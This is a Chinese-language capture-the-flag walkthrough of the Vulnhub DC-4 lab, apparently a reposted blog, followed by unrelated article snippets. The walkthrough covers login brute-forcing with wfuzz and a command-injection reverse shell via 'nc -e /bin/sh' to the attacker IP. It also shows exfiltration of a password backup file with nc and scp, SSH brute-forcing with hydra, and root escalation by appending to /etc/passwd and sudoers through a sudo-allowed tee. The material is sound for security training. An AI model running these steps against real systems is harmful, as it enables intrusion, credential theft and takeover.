Vulnhub-DC-4

靶機IP:192.168.20.138
kaliIP:192.168.20.128
網絡有問題的可以看下搭建Vulnhub靶機網絡問題(獲取不到IP)

信息收集

nmap掃下端口及版本
在這里插入圖片描述
dirsearch掃下目錄
在這里插入圖片描述
沒發現什么敏感信息,看下前端界面
在這里插入圖片描述
想到會不會存在SQL注入,弱密碼等漏洞。
經過測試SQL注入漏洞是不存在的,這里講下弱密碼爆破。
由提示’Admin Information Systems Login’想到管理員賬號會不會是systems或者admin,
用到了wfuzz,使用見爆破工具wfuzz的使用筆記
這里先用rockyou.txt的前10000個口令(全部口令太多)

wfuzz -c -v -w pass.txt -d "username=admin&password=FUZZ" --hh 206 -u http://192.168.20.138/login.php

解釋下參數,-w是指定字典,-d是POST提交,FUZZ是字典位置,–hh 206是隱藏響應頭長度為 206 字節的響應。
因為如果登陸失敗返回的響應頭長度為
在這里插入圖片描述
在這里插入圖片描述
拿到admin密碼,登入。
這里面有個重定向,登錄一直被重定向到index.php,登陸進去手動進到login.php頁面就好啦。

漏洞利用

看到有個命令執行漏洞
在這里插入圖片描述
burp抓包修改參數radio可以執行任何命令,我們執行nc -e /bin/sh 192.168.20.128 6666,反彈shell。
之后可以用python獲得交互shell。

提權

之后查看passwd,獲得三個用戶,去home目錄下看看有什么信息。
發現jim目錄下有個mbox(無法讀取),backup.bak(備份文件)。

www-data@dc-4:/usr/share/nginx/html$ cat /etc/passwd | grep "bin/bash"
cat /etc/passwd | grep "bin/bash"
root:x:0:0:root:/root:/bin/bash
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
www-data@dc-4:/usr/share/nginx/html$ whoami
whoami
www-data
www-data@dc-4:/usr/share/nginx/html$ ls /home/jim
ls /home/jim
backups  mbox  test.sh
www-data@dc-4:/usr/share/nginx/html$ ls /home/sam
ls /home/sam
www-data@dc-4:/usr/share/nginx/html$ ls /home/charles
ls /home/charles
www-data@dc-4:/usr/share/nginx/html$ ls /home/jim/backups
ls /home/jim/backups
old-passwords.bak

之后可以通過nc
kalinc -nvlp 6666 > pass.txt 接收文件,命名為pass.txt
靶機nc 192.168.20.128 6666 < old-passwords.bak
和scp命令把這個備份文件傳到kali上。

www-data@dc-4:/usr/share/nginx/html$ scp /home/jim/backups/old-passwords.bak root@192.168.20.128:/home/kali/Desktop
<asswords.bak root@192.168.20.128:/home/kali/Desktop
Could not create directory '/var/www/.ssh'.
The authenticity of host '192.168.20.128 (192.168.20.128)' can't be established.
ECDSA key fingerprint is SHA256:nqK5AUrd+/UQhRukAMzIDFooNn5Etiz8zvygHp5rkDY.
Are you sure you want to continue connecting (yes/no)? yes
yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
root@192.168.20.128's password: rootold-passwords.bak                             100% 2047   271.7KB/s   00:00

讀取.bak文件發現是密碼表。
在這里插入圖片描述

因為是從jim的文件拿過來的,之前信息收集又直達開放了ssh,所以我們用這個密碼表爆破SSH登錄JIM賬號。
爆破SSH使用hydra,使用教程見使用hydra進行SSH爆破
在這里插入圖片描述
爆破出SSH密碼:jibril04
之后我們直接ssh連接
在這里插入圖片描述
去讀取一下mbox
是封郵件測試
在這里插入圖片描述
之后我們去郵件路徑看看是否有其他郵件

jim@dc-4:~$ cd /var/mail/
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ vim jim
-bash: vim: command not found
jim@dc-4:/var/mail$ vi jim

在這里插入圖片描述
內容是Charles要去度假,boss讓他把自己的密碼交給Jim。
我們就拿到了Charles的密碼^xHhA&hvim0y
su登錄
在這里插入圖片描述
沒有SUID提權,運行下sudo -l發現tee命令。
在這里插入圖片描述
Linux tee命令用于讀取標準輸入的數據,并將其內容輸出成文件。
tee指令會從標準輸入設備讀取數據,將其內容輸出到標準輸出設備,同時保存成文件。
在這里插入圖片描述

  1. 我們直接在passwd中新建一個用戶給他root權限就好啦。
    在這里插入圖片描述
    這里-a是指在文件尾添加。
    之后find flag
charles@dc-4:/var/mail$ su y06z
# whoami
root
# find / -name flag*
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/root/flag.txt
# vim /root/flag.txt
sh: 3: vim: not found
# vi /root/flag.txt
# cat /root/flag.txt888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 Congratulations!!!Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.If you enjoyed this CTF, send me a tweet via @DCAU7.
  1. 也可以直接在/etc/sudoers中,給charles所有權限
    echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
charles@dc-4:/var/mail$ sudo -l
Matching Defaults entries for charles on dc-4:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser charles may run the following commands on dc-4:(root) NOPASSWD: /usr/bin/teehee(ALL : ALL) ALL
charles@dc-4:/var/mail$ sudo su
root@dc-4:/var/mail# cat /root/flag.txt888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 Congratulations!!!Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.If you enjoyed this CTF, send me a tweet via @DCAU7.

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/23929.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/23929.shtml
英文地址,請注明出處:http://en.pswp.cn/web/23929.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

k8s網絡問題以及容器跨宿主機通信原理

【0】資源配置文件 [rootmcwk8s03 mcwtest]# ls mcwdeploy.yaml [rootmcwk8s03 mcwtest]# cat mcwdeploy.yaml apiVersion: apps/v1 kind: Deployment metadata:labels:app: mcwpythonname: mcwtest-deploy spec:replicas: 1selector:matchLabels:app: mcwpythontemplate:met…

Linux進程間通信之管道

進程間通信介紹&#xff1a; 進程間通信的概念&#xff1a; 進程間通信簡稱IPC&#xff08;Interprocess communication&#xff09;&#xff0c;進程間通信就是在不同進程之間傳播或交換信息。 進程間通信的目的&#xff1a; 數據傳輸&#xff1a; 一個進程需要將它的數據…

開源WebGIS全流程常用技術棧

1 數據生產 1.1 uDig uDig&#xff08;http://udig.refractions.net/&#xff09;是一個基于Java開源的桌面應用框架&#xff0c;它構建在Eclipse RCP和GeoTools&#xff08;一個開源的Java GIS包)上。可以進行shp格式地圖文件的編輯和查看&#xff1b;是一個開源空間數據查看…

?在哪些場景下,使用SOCKS5代理會特別有用?(socks5代理ip)?

SOCKS5代理作為網絡協議轉換的利器&#xff0c;其獨特功能在眾多實際場景中展現出了極大的價值。以下是幾個特定場景&#xff0c;其中SOCKS5代理的使用將變得尤為重要&#xff1a; 一、網絡安全與隱私訪問 1.高級滲透測試&#xff1a;在網絡安全領域&#xff0c;滲透測試人員…

Java 異常處理 - 自定義異常

在Java中&#xff0c;自定義異常是一種創建新異常類的方式&#xff0c;這些異常類繼承自Throwable類或其子類Exception&#xff08;或RuntimeException&#xff0c;如果它是運行時異常的話&#xff09;。自定義異常通常用于描述特定于應用程序的錯誤情況&#xff0c;以便為調用…

MS21112S單通道 LVDS 差分線路接收器

MS21112S 是一款單通道低壓差分信號 (LVDS) 線 路接收器。在輸入共模電壓范圍內&#xff0c;差分接收器可以 將 100mV 的差分輸入電壓轉換成有效的邏輯輸出。 該芯片可應用于 100Ω 的受控阻抗介質上&#xff0c;進行點對 點基帶數據傳輸。傳輸介質可以是印刷電路板、…

配音方面目前可以用AIGC替代嗎?( 計育韜老師高校公益巡講答疑實錄2024)

這是計育韜老師第 8 次開展面向全國高校的新媒體技術公益巡講活動了。而在每場講座尾聲&#xff0c;互動答疑環節往往反映了高校師生當前最普遍的運營困境&#xff0c;特此計老師在現場即興答疑之外&#xff0c;會盡量選擇有較高價值的提問進行文字答疑梳理。 *本輪巡講主題除了…

360誤刪掉的文件怎么恢復?3種文件找回辦法!

360是一款電腦安全輔助軟件&#xff0c;可以用它來清理垃圾、查殺病毒、修復系統等。然而&#xff0c;有時文件可能會被360誤認為是垃圾而自動清理&#xff0c;造成重要文件丟失&#xff0c;那么360刪掉的文件怎么恢復&#xff1f;下面&#xff0c;讓我們一起來看看如何恢復文件…

三維點云擬合平面推導及源代碼C++

1、背景介紹 實際中,很多人工構造物是由平面結構構造而成,如下圖所示,為一典型的由多個平面組成的人工構筑物。因此,根據離散點擬合成平面,獲取擬合平面方程,是點云數據處理中非常常見的數據處理操作。 2、平面擬合參數推導 基于若離散點,估算平面方程過程如下: 3、程序…

電子設計教學新篇章:SmartEDA引領學校教學升級風潮

在數字化時代的浪潮中&#xff0c;電子設計教學領域正迎來一場革命性的變革。SmartEDA&#xff0c;作為電子設計課程的新寵&#xff0c;以其高效、智能的特性&#xff0c;正成為學校教學升級的重要推手。它不僅極大地提升了電子設計的效率&#xff0c;還為學生們帶來了更為深入…

ChatGPT-4o提示詞的九大酷炫用法,你知道幾個?

ChatGPT-4o提示詞的九大酷炫用法&#xff0c;你知道幾個&#xff1f;&#x1f680; 博主貓頭虎的技術世界 &#x1f31f; 歡迎來到貓頭虎的博客 — 探索技術的無限可能&#xff01; 專欄鏈接&#xff1a; &#x1f517; 精選專欄&#xff1a; 《面試題大全》 — 面試準備的寶典…

xstream運用,JAVA對象轉xml,xml轉JAVA對象

目錄 xstream 優點&#xff1a; 缺點&#xff1a; XStream的應用場景 用到的依賴 代碼實現 xml標簽對應的實體類 Header Package Request Response TradeInfo 工具類 XmlUtils 執行結果 xstream XStream是一個Java類庫&#xff0c;主要用于將對象序列化為XML&#xf…

OV通配符ssl證書是什么

通配符https證書的產品比較豐富&#xff0c;為了方便區分&#xff0c;可以按照驗證方式將通配符https證書分為DV基礎型通配符https證書和OV企業型通配符https證書兩種。其中OV通配符https證書申請條件高&#xff0c;審核也比較嚴格&#xff0c;相比于DV基礎型通配符https證書&a…

IPv4 和 IPv6 是什么意思?它們之間的區別都有哪些?

什么是 IPv4 和 IPv6 什么是 IPv4 和 IPv6 呢&#xff1f;下面我們就來了解一下。 IPv4 就是互聯網協議第 4 版&#xff0c;是目前廣泛使用的網絡協議版本。它由互聯網工程任務組&#xff08;IETF&#xff09;在 1981 年開發完成。IPv4 使用 32 位地址&#xff0c;允許大約 4…

推薦系統三十六式學習筆記:原理篇.近鄰推薦07|人以群分,你是什么人就看到什么世界

目錄 協同過濾基于用戶的協同過濾背后的思想原理實踐1、構造矩陣2、相似度計算3、推薦計算4、一些改進 應用場景&#xff1a;總結 談及推薦系統&#xff0c;不得不說大名鼎鼎的協同過濾。協同過濾的重點在于協同&#xff0c;所謂協同&#xff0c;也就是群體互幫互助&#xff0c…

初級軟件測試快速入門

文章目錄 初級軟件測試-測試用例、缺陷報告的認識與使用軟件測試簡介測試分類模型質量模型測試模型 用例編寫的八大要素用例設計方法缺陷 初級軟件測試-測試用例、缺陷報告的認識與使用 軟件測試簡介 什么是軟件測試&#xff1f; 使用技術手段驗證軟件是否滿足需求 主流技能 …

關于 Vue.js 中`transition`組件使用:頁面切換動畫和標簽移動動畫都是要用到的

一、引言 在 Vue.js 中&#xff0c;transition組件提供了一種簡單而強大的方式來實現頁面過渡效果。它可以讓元素在狀態改變時&#xff0c;如進入或離開視圖時&#xff0c;以平滑的動畫方式進行過渡。通過transition&#xff0c;我們可以為應用增添更加生動和吸引人的用戶體驗…

Linux文件編碼格式為unknown 8bit

file -i 1.txt顯示文件編碼為unknown 8bit, 說明這個文件的編碼格式因為一些不明原因無法識別了。 可以嘗試用其他編輯器打開&#xff0c;來看一下編輯器最終是用什么編碼格式打開的。 vim :set filecodingnotepad 直接打開文件&#xff0c;右下角會顯示文件編碼 假設文件編…

《數學學習與研究》雜志是什么級別?知網收錄嗎?評職認可嗎?

《數學學習與研究》雜志是什么級別&#xff1f;知網收錄嗎&#xff1f;評職認可嗎&#xff1f; 《數學學習與研究》是由東北師范大學主管&#xff0c;吉林省數學會與東北師范大學出版社聯合主辦的省級優秀數學類期刊雜志。該雜志為半月刊&#xff0c;國際標準刊號為 ISSN1007-…